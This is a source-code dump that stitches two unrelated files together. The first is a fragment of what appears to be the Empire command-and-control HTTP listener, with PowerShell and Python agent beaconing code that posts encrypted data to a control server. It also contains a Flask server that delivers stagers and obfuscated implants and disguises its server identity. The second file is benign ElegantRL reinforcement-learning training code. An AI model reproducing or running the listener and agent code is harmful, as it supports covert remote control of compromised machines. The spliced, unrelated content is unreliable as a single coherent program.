$EncBytes = Encrypt-Bytes $Packets
# build the top level RC4 "routing packet"
# meta 'RESULT_POST' : 5
$RoutingPacket = New-RoutingPacket -EncData $EncBytes -Meta 5
if($Script:ControlServers[$Script:ServerIndex].StartsWith('http')) {
# build the web request object
$wc = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$wc.Proxy = $Script:Proxy;
}
$wc.Headers.Add('User-Agent', $Script:UserAgent)
$Script:Headers.GetEnumerator() | ForEach-Object {$wc.Headers.Add($_.Name, $_.Value)}
try {
# get a random posting URI
$taskURI = $Script:TaskURIs | Get-Random
$response = $wc.UploadData($Script:ControlServers[$Script:ServerIndex]+$taskURI, 'POST', $RoutingPacket);
}
catch [System.Net.WebException]{
# exception posting data...
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
}
}
"""
return updateServers + getTask + sendMessage
elif language.lower() == 'python':
updateServers = "server = '%s'\n" % (listenerOptions['Host']['Value'])
if listenerOptions['Host']['Value'].startswith('https'):
updateServers += "hasattr(ssl, '_create_unverified_context') and ssl._create_unverified_context() or None"
sendMessage = """
def send_message(packets=None):
# Requests a tasking or posts data to a randomized tasking URI.
# If packets == None, the agent GETs a tasking from the control server.
# If packets != None, the agent encrypts the passed packets and
# POSTs the data to the control server.
global missedCheckins
global server
global headers
global taskURIs
data = None
if packets:
data = ''.join(packets)
# aes_encrypt_then_hmac is in stager.py
encData = aes_encrypt_then_hmac(key, data)
data = build_routing_packet(stagingKey, sessionID, meta=5, encData=encData)
else:
# if we're GETting taskings, then build the routing packet to stuff into a cookie first.
# meta TASKING_REQUEST = 4
routingPacket = build_routing_packet(stagingKey, sessionID, meta=4)
b64routingPacket = base64.b64encode(routingPacket)
headers['Cookie'] = "session=%s" % (b64routingPacket)
taskURI = random.sample(taskURIs, 1)[0]
requestUri = server + taskURI
try:
data = (urllib2.urlopen(urllib2.Request(requestUri, data, headers))).read()
return ('200', data)
except urllib2.HTTPError as HTTPError:
# if the server is reached, but returns an error (like 404)
missedCheckins = missedCheckins + 1
#if signaled for restaging, exit.
if HTTPError.code == 401:
sys.exit(0)
return (HTTPError.code, '')
except urllib2.URLError as URLerror:
# if the server cannot be reached
missedCheckins = missedCheckins + 1
return (URLerror.reason, '')
return ('', '')
"""
return updateServers + sendMessage
else:
print helpers.color("[!] listeners/http generate_comms(): invalid language specification, only 'powershell' and 'python' are currently supported for this module.")
else:
print(helpers.color('[!] listeners/http generate_comms(): no language specified!'))
def start_server(self, listenerOptions):
"""
Threaded function that actually starts up the Flask server.
"""
# make a copy of the currently set listener options for later stager/agent generation
listenerOptions = copy.deepcopy(listenerOptions)
# suppress the normal Flask output
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
bindIP = listenerOptions['BindIP']['Value']
host = listenerOptions['Host']['Value']
port = listenerOptions['Port']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
stagerURI = listenerOptions['StagerURI']['Value']
userAgent = self.options['UserAgent']['Value']
listenerName = self.options['Name']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
app = Flask(__name__)
self.app = app
@app.route('/download/<stager>')
def send_stager(stager):
if stager:
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=False, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
return launcher
else:
pass
@app.before_request
def check_ip():
"""
Before every request, check if the IP address is allowed.
"""
if not self.mainMenu.agents.is_ip_allowed(request.remote_addr):
dispatcher.send("[!] %s on the blacklist/not on the whitelist requested resource" % (request.remote_addr), sender="listeners/http")
return make_response(self.default_response(), 200)
@app.after_request
def change_header(response):
"Modify the default server version in the response."
response.headers['Server'] = listenerOptions['ServerVersion']['Value']
return response
@app.after_request
def add_proxy_headers(response):
"Add HTTP headers to avoid proxy caching."
response.headers['Cache-Control'] = "no-cache, no-store, must-revalidate"
response.headers['Pragma'] = "no-cache"
response.headers['Expires'] = "0"
return response
@app.route('/<path:request_uri>', methods=['GET'])
def handle_get(request_uri):
"""
Handle an agent GET request.
This is used during the first step of the staging process,
and when the agent requests taskings.
"""
clientIP = request.remote_addr
dispatcher.send("[*] GET request for %s/%s from %s" % (request.host, request_uri, clientIP), sender='listeners/http')
routingPacket = None
cookie = request.headers.get('Cookie')
if cookie and cookie != '':
try:
# see if we can extract the 'routing packet' from the specified cookie location
# NOTE: this can be easily moved to a parameter, another cookie value, etc.
if 'session' in cookie:
dispatcher.send("[*] GET cookie value from %s : %s" % (clientIP, cookie), sender='listeners/http')
cookieParts = cookie.split(';')
for part in cookieParts:
if part.startswith('session'):
base64RoutingPacket = part[part.find('=')+1:]
# decode the routing packet base64 value in the cookie
routingPacket = base64.b64decode(base64RoutingPacket)
except Exception as e:
routingPacket = None
pass
if routingPacket:
# parse the routing packet and process the results
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, routingPacket, listenerOptions, clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if results:
if results == 'STAGE0':
# handle_agent_data() signals that the listener should return the stager.ps1 code
# step 2 of negotiation -> return stager.ps1 (stage 1)
dispatcher.send("[*] Sending %s stager (stage 1) to %s" % (language, clientIP), sender='listeners/http')
stage = self.generate_stager(language=language, listenerOptions=listenerOptions, obfuscate=self.mainMenu.obfuscate, obfuscationCommand=self.mainMenu.obfuscateCommand)
return make_response(stage, 200)
elif results.startswith('ERROR:'):
dispatcher.send("[!] Error from agents.handle_agent_data() for %s from %s: %s" % (request_uri, clientIP, results), sender='listeners/http')
if 'not in cache' in results:
# signal the client to restage
print helpers.color("[*] Orphaned agent from %s, signaling restaging" % (clientIP))
return make_response(self.default_response(), 401)
else:
return make_response(self.default_response(), 200)
else:
# actual taskings
dispatcher.send("[*] Agent from %s retrieved taskings" % (clientIP), sender='listeners/http')
return make_response(results, 200)
else:
# dispatcher.send("[!] Results are None...", sender='listeners/http')
return make_response(self.default_response(), 200)
else:
return make_response(self.default_response(), 200)
else:
dispatcher.send("[!] %s requested by %s with no routing packet." % (request_uri, clientIP), sender='listeners/http')
return make_response(self.default_response(), 200)
@app.route('/<path:request_uri>', methods=['POST'])
def handle_post(request_uri):
"""
Handle an agent POST request.
"""
stagingKey = listenerOptions['StagingKey']['Value']
clientIP = request.remote_addr
requestData = request.get_data()
dispatcher.send("[*] POST request data length from %s : %s" % (clientIP, len(requestData)), sender='listeners/http')
# the routing packet should be at the front of the binary request.data
# NOTE: this can also go into a cookie/etc.
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, requestData, listenerOptions, clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if results:
if results.startswith('STAGE2'):
# TODO: document the exact results structure returned
if ':' in clientIP:
clientIP = '[' + str(clientIP) + ']'
sessionID = results.split(' ')[1].strip()
sessionKey = self.mainMenu.agents.agents[sessionID]['sessionKey']
dispatcher.send("[*] Sending agent (stage 2) to %s at %s" % (sessionID, clientIP), sender='listeners/http')
hopListenerName = request.headers.get('Hop-Name')
try:
hopListener = helpers.get_listener_options(hopListenerName)
tempListenerOptions = copy.deepcopy(listenerOptions)
tempListenerOptions['Host']['Value'] = hopListener['Host']['Value']
except TypeError:
tempListenerOptions = listenerOptions
# step 6 of negotiation -> server sends patched agent.ps1/agent.py
agentCode = self.generate_agent(language=language, listenerOptions=tempListenerOptions, obfuscate=self.mainMenu.obfuscate, obfuscationCommand=self.mainMenu.obfuscateCommand)
encryptedAgent = encryption.aes_encrypt_then_hmac(sessionKey, agentCode)
# TODO: wrap ^ in a routing packet?
return make_response(encryptedAgent, 200)
elif results[:10].lower().startswith('error') or results[:10].lower().startswith('exception'):
dispatcher.send("[!] Error returned for results by %s : %s" %(clientIP, results), sender='listeners/http')
return make_response(self.default_response(), 200)
elif results == 'VALID':
dispatcher.send("[*] Valid results return by %s" % (clientIP), sender='listeners/http')
return make_response(self.default_response(), 200)
else:
return make_response(results, 200)
else:
return make_response(self.default_response(), 200)
else:
return make_response(self.default_response(), 200)
try:
certPath = listenerOptions['CertPath']['Value']
host = listenerOptions['Host']['Value']
if certPath.strip() != '' and host.startswith('https'):
certPath = os.path.abspath(certPath)
pyversion = sys.version_info
# support any version of tls
if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13:
proto = ssl.PROTOCOL_TLS
elif pyversion[0] >= 3:
proto = ssl.PROTOCOL_TLS
else:
proto = ssl.PROTOCOL_SSLv23
context = ssl.SSLContext(proto)
context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath))
app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context)
else:
app.run(host=bindIP, port=int(port), threaded=True)
except Exception as e:
print helpers.color("[!] Listener startup on port %s failed: %s " % (port, e))
dispatcher.send("[!] Listener startup on port %s failed: %s " % (port, e), sender='listeners/http')
def start(self, name=''):
"""
Start a threaded instance of self.start_server() and store it in the
self.threads dictionary keyed by the listener name.
"""
listenerOptions = self.options
if name and name != '':
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
else:
name = listenerOptions['Name']['Value']
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
def shutdown(self, name=''):
"""
Terminates the server thread stored in the self.threads dictionary,
keyed by the listener name.
"""
if name and name != '':
print helpers.color("[!] Killing listener '%s'" % (name))
self.threads[name].kill()
else:
print helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value']))
self.threads[self.options['Name']['Value']].kill()
|
run.py
|
import os
import sys
import time
import torch
import numpy as np
import numpy.random as rd
import multiprocessing as mp
from elegantrl.env import build_env, build_eval_env
from elegantrl.replay import ReplayBuffer, ReplayBufferMP
from elegantrl.evaluator import Evaluator
"""[ElegantRL.2021.10.21](https://github.com/AI4Finance-Foundation/ElegantRL)"""
class Arguments: # [ElegantRL.2021.10.21]
def __init__(self, env, agent):
self.env = env # the environment for training
self.env_num = getattr(env, 'env_num', 1) # env_num = 1. In vector env, env_num > 1.
self.max_step = getattr(env, 'max_step', None) # the max step of an episode
self.state_dim = getattr(env, 'state_dim', None) # vector dimension (feature number) of state
self.action_dim = getattr(env, 'action_dim', None) # vector dimension (feature number) of action
self.if_discrete = getattr(env, 'if_discrete', None) # discrete or continuous action space
self.target_return = getattr(env, 'target_return', None) # target average episode return
self.agent = agent # Deep Reinforcement Learning algorithm
self.if_off_policy = agent.if_off_policy # agent is on-policy or off-policy
if self.if_off_policy: # off-policy
self.net_dim = 2 ** 8 # the network width
self.max_memo = 2 ** 21 # capacity of replay buffer
self.batch_size = self.net_dim # num of transitions sampled from replay buffer.
self.target_step = 2 ** 10 # collect target_step transitions, then update the network
self.repeat_times = 2 ** 0 # repeatedly update network to keep critic's loss small
self.if_per_or_gae = False # use PER (Prioritized Experience Replay) for sparse reward
else: # on-policy
self.net_dim = 2 ** 9 # the network width
self.max_memo = 2 ** 12 # capacity of replay buffer
self.batch_size = self.net_dim * 2 # num of transitions sampled from replay buffer.
self.target_step = self.max_memo # collect target_step transitions, then update the network
self.repeat_times = 2 ** 3 # repeatedly update network to keep critic's loss small
self.if_per_or_gae = False # use GAE (Generalized Advantage Estimation) for sparse reward
'''Arguments for training'''
self.gamma = 0.99 # discount factor of future rewards
self.reward_scale = 2 ** 0 # reward scaling factor; an approximate target reward is usually close to 256
self.learning_rate = 2 ** -15 # 2 ** -15 ~= 3e-5
self.soft_update_tau = 2 ** -8 # 2 ** -8 ~= 5e-3
'''Arguments for device'''
self.worker_num = 2 # number of rollout workers per GPU (adjust it to get high GPU usage)
self.thread_num = 8 # number of CPU threads for evaluating the model; passed to torch.set_num_threads(self.thread_num)
self.random_seed = 0 # initialize random seed in self.init_before_training()
self.learner_gpus = (0,) # for example: os.environ['CUDA_VISIBLE_DEVICES'] = '0, 2,'
self.workers_gpus = self.learner_gpus # for GPU_VectorEnv (such as isaac gym)
'''Arguments for evaluate and save'''
self.cwd = None # the directory path to save the model
self.if_remove = True # remove the cwd folder? (True, False, None:ask me)
self.break_step = +np.inf # break training after 'total_step > break_step'
self.if_allow_break = True # allow break training when reach goal (early termination)
self.eval_env = None # the environment for evaluating. None means set automatically.
self.eval_gap = 2 ** 8 # evaluate the agent every eval_gap seconds
self.eval_times1 = 2 ** 2 # number of episodes for the first (quick) evaluation
self.eval_times2 = 2 ** 4 # number of episodes for the second (thorough) evaluation
self.eval_gpu_id = None # -1 means use cpu, >=0 means use GPU, None means set as learner_gpus[0]
self.if_overwrite = False # Save policy networks with different episode return or overwrite
def init_before_training(self):
np.random.seed(self.random_seed)
torch.manual_seed(self.random_seed)
torch.set_num_threads(self.thread_num)
torch.set_default_dtype(torch.float32)
'''env'''
assert isinstance(self.env_num, int)
assert isinstance(self.max_step, int)
assert isinstance(self.state_dim, int) or isinstance(self.state_dim, tuple)
assert isinstance(self.action_dim, int)
assert isinstance(self.if_discrete, bool)
assert isinstance(self.target_return, int) or isinstance(self.target_return, float)
'''agent'''
assert hasattr(self.agent, 'init')
assert hasattr(self.agent, 'update_net')
assert hasattr(self.agent, 'explore_env')
assert hasattr(self.agent, 'select_actions')
'''auto set'''
if self.cwd is None:
agent_name = self.agent.__class__.__name__
env_name = getattr(self.env, 'env_name', self.env)
self.cwd = f'./{agent_name}_{env_name}_{self.learner_gpus}'
if self.eval_gpu_id is None:
self.eval_gpu_id = self.learner_gpus[0]
'''remove history'''
if self.if_remove is None:
self.if_remove = bool(input(f"| PRESS 'y' to REMOVE: {self.cwd}? ") == 'y')
elif self.if_remove:
import shutil
shutil.rmtree(self.cwd, ignore_errors=True)
print(f"| Remove cwd: {self.cwd}")
else:
print(f"| Keep cwd: {self.cwd}")
os.makedirs(self.cwd, exist_ok=True)
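# Usage sketch (illustrative only; the agent class and the gym id below are assumptions,
# not definitions from this file): build an Arguments object from an env and an agent,
# then hand it to one of the training entry points defined further down.
#
#   from elegantrl.agent import AgentSAC                  # assumed off-policy agent class
#   args = Arguments(env=build_env('Pendulum-v1'), agent=AgentSAC())
#   args.learner_gpus = (0,)
#   train_and_evaluate(args)      # single process; train_and_evaluate_mp(args) for multi-process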
'''single processing training'''
def train_and_evaluate(args, learner_id=0):
args.init_before_training() # necessary!
'''init: Agent'''
agent = args.agent
agent.init(net_dim=args.net_dim, gpu_id=args.learner_gpus[learner_id],
state_dim=args.state_dim, action_dim=args.action_dim, env_num=args.env_num,
learning_rate=args.learning_rate, if_per_or_gae=args.if_per_or_gae)
agent.save_or_load_agent(args.cwd, if_save=False)
env = build_env(env=args.env, if_print=False, device_id=args.eval_gpu_id, env_num=args.env_num)
if env.env_num == 1:
agent.states = [env.reset(), ]
assert isinstance(agent.states[0], np.ndarray)
assert agent.states[0].shape == (env.state_dim,)
else:
agent.states = env.reset()
assert isinstance(agent.states, torch.Tensor)
assert agent.states.shape == (env.env_num, env.state_dim)
'''init Evaluator'''
eval_env = build_eval_env(args.eval_env, args.env, args.eval_gpu_id, args.env_num)
evaluator = Evaluator(cwd=args.cwd, agent_id=0,
eval_env=eval_env, eval_gap=args.eval_gap,
eval_times1=args.eval_times1, eval_times2=args.eval_times2,
target_return=args.target_return, if_overwrite=args.if_overwrite)
evaluator.save_or_load_recoder(if_save=False)
'''init ReplayBuffer'''
if args.if_off_policy:
buffer = ReplayBuffer(max_len=args.max_memo, state_dim=env.state_dim,
action_dim=1 if env.if_discrete else env.action_dim,
if_use_per=args.if_per_or_gae, gpu_id=args.learner_gpus[learner_id])
buffer.save_or_load_history(args.cwd, if_save=False)
def update_buffer(_traj_list):
ten_state, ten_other = _traj_list[0]
buffer.extend_buffer(ten_state, ten_other)
_steps, _r_exp = get_step_r_exp(ten_reward=ten_other[0]) # other = (reward, mask, action)
return _steps, _r_exp
else:
buffer = list()
def update_buffer(_traj_list):
(ten_state, ten_reward, ten_mask, ten_action, ten_noise) = _traj_list[0]
buffer[:] = (ten_state.squeeze(1),
ten_reward,
ten_mask,
ten_action.squeeze(1),
ten_noise.squeeze(1))
_step, _r_exp = get_step_r_exp(ten_reward=buffer[1])
return _step, _r_exp
"""start training"""
cwd = args.cwd
gamma = args.gamma
break_step = args.break_step
batch_size = args.batch_size
target_step = args.target_step
repeat_times = args.repeat_times
reward_scale = args.reward_scale
if_allow_break = args.if_allow_break
soft_update_tau = args.soft_update_tau
del args
'''init ReplayBuffer after training start'''
if agent.if_off_policy:
if_load = buffer.save_or_load_history(cwd, if_save=False)
if not if_load:
traj_list = agent.explore_env(env, target_step, reward_scale, gamma)
steps, r_exp = update_buffer(traj_list)
evaluator.total_step += steps
'''start training loop'''
if_train = True
while if_train:
with torch.no_grad():
traj_list = agent.explore_env(env, target_step, reward_scale, gamma)
steps, r_exp = update_buffer(traj_list)
logging_tuple = agent.update_net(buffer, batch_size, repeat_times, soft_update_tau)
with torch.no_grad():
temp = evaluator.evaluate_and_save(agent.act, steps, r_exp, logging_tuple)
if_reach_goal, if_save = temp
if_train = not ((if_allow_break and if_reach_goal)
or evaluator.total_step > break_step
or os.path.exists(f'{cwd}/stop'))
print(f'| UsedTime: {time.time() - evaluator.start_time:>7.0f} | SavedDir: {cwd}')
agent.save_or_load_agent(cwd, if_save=True)
buffer.save_or_load_history(cwd, if_save=True) if agent.if_off_policy else None
evaluator.save_or_load_recoder(if_save=True)
def get_step_r_exp(ten_reward):
return len(ten_reward), ten_reward.mean().item()
'''multiple processing training'''
def train_and_evaluate_mp(args, agent_id=0):
args.init_before_training() # necessary!
process = list()
mp.set_start_method(method='spawn', force=True) # force all the multiprocessing to 'spawn' methods
'''learner'''
learner_num = len(args.learner_gpus)
learner_pipe = PipeLearner(learner_num)
for learner_id in range(learner_num):
'''evaluator'''
if learner_id == learner_num - 1:
evaluator_pipe = PipeEvaluator()
process.append(mp.Process(target=evaluator_pipe.run, args=(args, agent_id)))
else:
evaluator_pipe = None
'''explorer'''
worker_pipe = PipeWorker(args.env_num, args.worker_num)
for worker_id in range(args.worker_num):
# if args.env_num == 1:
# env_pipe = None
# else:
# env_pipe = PipeVectorEnv(args)
# process.extend(env_pipe.process)
env_pipe = None
process.append(mp.Process(target=worker_pipe.run, args=(args, env_pipe, worker_id, learner_id)))
process.append(mp.Process(target=learner_pipe.run, args=(args, evaluator_pipe, worker_pipe, learner_id)))
for p in process:
p.start()
time.sleep(0.1)
process[-1].join()
process_safely_terminate(process)
class PipeWorker:
def __init__(self, env_num, worker_num):
self.env_num = env_num
self.worker_num = worker_num
self.pipes = [mp.Pipe() for _ in range(worker_num)]
self.pipe1s = [pipe[1] for pipe in self.pipes]
def explore0(self, agent):
act_dict = agent.act.state_dict()
for worker_id in range(self.worker_num):
self.pipe1s[worker_id].send(act_dict)
traj_lists = [pipe1.recv() for pipe1 in self.pipe1s]
return traj_lists
def explore(self, agent):
act_dict = agent.act.state_dict()
if sys.platform == 'win32': # todo: not elegant. YonV1943. Avoid CUDA runtime error (801)
# On Windows with Python < 3.9, multiprocessing cannot send CUDA tensors, so send CPU tensors instead
for key, value in act_dict.items():
act_dict[key] = value.to(torch.device('cpu'))
for worker_id in range(self.worker_num):
self.pipe1s[worker_id].send(act_dict)
traj_lists = [pipe1.recv() for pipe1 in self.pipe1s]
return traj_lists
def run(self, args, _comm_env, worker_id, learner_id): # not elegant: comm_env
# print(f'| os.getpid()={os.getpid()} PipeExplore.run {learner_id}')
env = build_env(env=args.env, if_print=False, device_id=args.workers_gpus[learner_id], env_num=args.env_num)
'''init Agent'''
agent = args.agent
agent.init(net_dim=args.net_dim, gpu_id=args.learner_gpus[learner_id],
state_dim=args.state_dim, action_dim=args.action_dim, env_num=args.env_num,
learning_rate=args.learning_rate, if_per_or_gae=args.if_per_or_gae)
if args.env_num == 1:
agent.states = [env.reset(), ]
else:
agent.states = env.reset() # VecEnv
'''loop'''
gamma = args.gamma
target_step = args.target_step
reward_scale = args.reward_scale
del args
with torch.no_grad():
while True:
act_dict = self.pipes[worker_id][0].recv()
if sys.platform == 'win32': # todo: not elegant. YonV1943. Avoid CUDA runtime error (801)
# On Windows with Python < 3.9, multiprocessing cannot send CUDA tensors, so send CPU tensors instead
for key, value in act_dict.items():
act_dict[key] = value.to(agent.device)
agent.act.load_state_dict(act_dict)
trajectory = agent.explore_env(env, target_step, reward_scale, gamma)
if sys.platform == 'win32': # todo: not elegant. YonV1943. Avoid CUDA runtime error (801)
# On Windows with Python < 3.9, multiprocessing cannot send CUDA tensors, so send CPU tensors instead
trajectory = [[item.to(torch.device('cpu'))
for item in item_list]
for item_list in trajectory]
self.pipes[worker_id][0].send(trajectory)
class PipeLearner:
def __init__(self, learner_num):
self.learner_num = learner_num
self.round_num = int(np.log2(learner_num))
self.pipes = [mp.Pipe() for _ in range(learner_num)]
pipes = [mp.Pipe() for _ in range(learner_num)]
self.pipe0s = [pipe[0] for pipe in pipes]
self.pipe1s = [pipe[1] for pipe in pipes]
self.device_list = [torch.device(f'cuda:{i}') for i in range(learner_num)]
if learner_num == 1:
self.idx_l = None
elif learner_num == 2:
self.idx_l = [(1,), (0,), ]
elif learner_num == 4:
self.idx_l = [(1, 2), (0, 3),
(3, 0), (2, 1), ]
elif learner_num == 8:
self.idx_l = [(1, 2, 4), (0, 3, 5),
(3, 0, 6), (2, 1, 7),
(5, 6, 0), (4, 7, 1),
(7, 4, 2), (6, 5, 3), ]
else:
print(f"| LearnerPipe, ERROR: learner_num {learner_num} should in (1, 2, 4, 8)")
exit()
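# Each row of idx_l lists, for one learner, the partner used in every averaging round;
# with 2**n learners this forms a hypercube-style exchange, so after the
# log2(learner_num) rounds performed in comm_network_optim() every learner holds the
# average of all learners' parameters.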
def comm_data(self, data, learner_id, round_id):
if round_id == -1:
learner_jd = self.idx_l[learner_id][round_id]
self.pipes[learner_jd][0].send(data)
return self.pipes[learner_id][1].recv()
else:
learner_jd = self.idx_l[learner_id][round_id]
self.pipe0s[learner_jd].send(data)
return self.pipe1s[learner_id].recv()
def comm_network_optim(self, agent, learner_id):
device = self.device_list[learner_id]
for round_id in range(self.round_num):
data = get_comm_data(agent)
data = self.comm_data(data, learner_id, round_id)
if data:
avg_update_net(agent.act, data[0], device)
avg_update_optim(agent.act_optim, data[1], device) if data[1] else None
avg_update_net(agent.cri, data[2], device) if data[2] else None
avg_update_optim(agent.cri_optim, data[3], device)
avg_update_net(agent.act_target, data[4], device) if agent.if_use_act_target else None
avg_update_net(agent.cri_target, data[5], device) if agent.if_use_cri_target else None
def run0(self, args, comm_eva, comm_exp, learner_id=0):
# print(f'| os.getpid()={os.getpid()} PipeLearn.run, {learner_id}')
pass
'''init Agent'''
agent = args.agent
agent.init(net_dim=args.net_dim, gpu_id=args.learner_gpus[learner_id],
state_dim=args.state_dim, action_dim=args.action_dim, env_num=args.env_num,
learning_rate=args.learning_rate, if_per_or_gae=args.if_per_or_gae)
agent.save_or_load_agent(args.cwd, if_save=False)
'''init ReplayBuffer'''
if agent.if_off_policy:
buffer_num = args.worker_num * args.env_num
if self.learner_num > 1:
buffer_num *= 2
buffer = ReplayBufferMP(max_len=args.max_memo, state_dim=args.state_dim,
action_dim=1 if args.if_discrete else args.action_dim,
if_use_per=args.if_per_or_gae,
buffer_num=buffer_num, gpu_id=args.learner_gpus[learner_id])
buffer.save_or_load_history(args.cwd, if_save=False)
def update_buffer(_traj_list):
step_sum = 0
r_exp_sum = 0
for buffer_i, (ten_state, ten_other) in enumerate(_traj_list):
buffer.buffers[buffer_i].extend_buffer(ten_state, ten_other)
step_r_exp = get_step_r_exp(ten_reward=ten_other[:, 0]) # other = (reward, mask, action)
step_sum += step_r_exp[0]
r_exp_sum += step_r_exp[1]
return step_sum, r_exp_sum / len(_traj_list)
else:
buffer = list()
def update_buffer(_traj_list):
_traj_list = list(map(list, zip(*_traj_list)))
_traj_list = [torch.cat(t, dim=0) for t in _traj_list]
(ten_state, ten_reward, ten_mask, ten_action, ten_noise) = _traj_list
buffer[:] = (ten_state.squeeze(1),
ten_reward,
ten_mask,
ten_action.squeeze(1),
ten_noise.squeeze(1))
_step, _r_exp = get_step_r_exp(ten_reward=buffer[1])
return _step, _r_exp
'''start training'''
cwd = args.cwd
batch_size = args.batch_size
repeat_times = args.repeat_times
soft_update_tau = args.soft_update_tau
del args
if_train = True
while if_train:
traj_lists = comm_exp.explore(agent)
if self.learner_num > 1:
data = self.comm_data(traj_lists, learner_id, round_id=-1)
traj_lists.extend(data)
traj_list = sum(traj_lists, list())
steps, r_exp = update_buffer(traj_list)
del traj_lists
logging_tuple = agent.update_net(buffer, batch_size, repeat_times, soft_update_tau)
if self.learner_num > 1:
self.comm_network_optim(agent, learner_id)
if comm_eva:
if_train, if_save = comm_eva.evaluate_and_save_mp(agent.act, steps, r_exp, logging_tuple)
agent.save_or_load_agent(cwd, if_save=True)
if agent.if_off_policy:
print(f"| LearnerPipe.run: ReplayBuffer saving in {cwd}")
buffer.save_or_load_history(cwd, if_save=True)
def run(self, args, comm_eva, comm_exp, learner_id=0):
# print(f'| os.getpid()={os.getpid()} PipeLearn.run, {learner_id}')
pass
'''init Agent'''
agent = args.agent
agent.init(net_dim=args.net_dim, gpu_id=args.learner_gpus[learner_id],
state_dim=args.state_dim, action_dim=args.action_dim, env_num=args.env_num,
learning_rate=args.learning_rate, if_per_or_gae=args.if_per_or_gae)
agent.save_or_load_agent(args.cwd, if_save=False)
'''init ReplayBuffer'''
if agent.if_off_policy:
buffer_num = args.worker_num * args.env_num
if self.learner_num > 1:
buffer_num *= 2
buffer = ReplayBufferMP(max_len=args.max_memo, state_dim=args.state_dim,
action_dim=1 if args.if_discrete else args.action_dim,
if_use_per=args.if_per_or_gae,
buffer_num=buffer_num, gpu_id=args.learner_gpus[learner_id])
buffer.save_or_load_history(args.cwd, if_save=False)
def update_buffer(_traj_list):
step_sum = 0
r_exp_sum = 0
for buffer_i, (ten_state, ten_other) in enumerate(_traj_list):
buffer.buffers[buffer_i].extend_buffer(ten_state, ten_other)
step_r_exp = get_step_r_exp(ten_reward=ten_other[:, 0]) # other = (reward, mask, action)
step_sum += step_r_exp[0]
r_exp_sum += step_r_exp[1]
return step_sum, r_exp_sum / len(_traj_list)
else:
buffer = list()
def update_buffer(_traj_list):
_traj_list = list(map(list, zip(*_traj_list)))
_traj_list = [torch.cat(t, dim=0) for t in _traj_list]
(ten_state, ten_reward, ten_mask, ten_action, ten_noise) = _traj_list
buffer[:] = (ten_state.squeeze(1),
ten_reward,
ten_mask,
ten_action.squeeze(1),
ten_noise.squeeze(1))
_step, _r_exp = get_step_r_exp(ten_reward=buffer[1])
return _step, _r_exp
'''start training'''
cwd = args.cwd
batch_size = args.batch_size
repeat_times = args.repeat_times
soft_update_tau = args.soft_update_tau
del args
if_train = True
while if_train:
traj_lists = comm_exp.explore(agent)
if self.learner_num > 1:
data = self.comm_data(traj_lists, learner_id, round_id=-1)
traj_lists.extend(data)
traj_list = sum(traj_lists, list())
if sys.platform == 'win32': # todo: not elegant. YonV1943. Avoid CUDA runtime error (801)
# On Windows with Python < 3.9, multiprocessing cannot send CUDA tensors, so send CPU tensors instead
traj_list = [[item.to(torch.device('cpu'))
for item in item_list]
for item_list in traj_list]
steps, r_exp = update_buffer(traj_list)
del traj_lists
logging_tuple = agent.update_net(buffer, batch_size, repeat_times, soft_update_tau)
if self.learner_num > 1:
self.comm_network_optim(agent, learner_id)
if comm_eva:
if_train, if_save = comm_eva.evaluate_and_save_mp(agent.act, steps, r_exp, logging_tuple)
agent.save_or_load_agent(cwd, if_save=True)
if agent.if_off_policy:
print(f"| LearnerPipe.run: ReplayBuffer saving in {cwd}")
buffer.save_or_load_history(cwd, if_save=True)
class PipeEvaluator: # [ElegantRL.10.21]
def __init__(self):
super().__init__()
self.pipe0, self.pipe1 = mp.Pipe()
def evaluate_and_save_mp(self, agent_act, steps, r_exp, logging_tuple):
if self.pipe1.poll(): # if_evaluator_idle
if_train, if_save = self.pipe1.recv()
act_cpu_dict = {k: v.cpu() for k, v in agent_act.state_dict().items()}
else:
if_train, if_save = True, False
act_cpu_dict = None
self.pipe1.send((act_cpu_dict, steps, r_exp, logging_tuple))
return if_train, if_save
def run(self, args, _learner_id):
# print(f'| os.getpid()={os.getpid()} PipeEvaluate.run {agent_id}')
pass
'''init: Agent'''
agent = args.agent
agent.init(net_dim=args.net_dim, gpu_id=args.eval_gpu_id,
state_dim=args.state_dim, action_dim=args.action_dim, env_num=args.env_num,
learning_rate=args.learning_rate, if_per_or_gae=args.if_per_or_gae)
agent.save_or_load_agent(args.cwd, if_save=False)
act = agent.act
[setattr(param, 'requires_grad', False) for param in agent.act.parameters()]
del agent
'''init Evaluator'''
eval_env = build_eval_env(args.eval_env, args.env, args.eval_gpu_id, args.env_num)
evaluator = Evaluator(cwd=args.cwd, agent_id=0,
eval_env=eval_env, eval_gap=args.eval_gap,
eval_times1=args.eval_times1, eval_times2=args.eval_times2,
target_return=args.target_return, if_overwrite=args.if_overwrite)
evaluator.save_or_load_recoder(if_save=False)
'''loop'''
cwd = args.cwd
break_step = args.break_step
if_allow_break = args.if_allow_break
del args
if_save = False
if_train = True
if_reach_goal = False
with torch.no_grad():
while if_train:
act_dict, steps, r_exp, logging_tuple = self.pipe0.recv()
if act_dict:
act.load_state_dict(act_dict)
if_reach_goal, if_save = evaluator.evaluate_and_save(act, steps, r_exp, logging_tuple)
else:
evaluator.total_step += steps
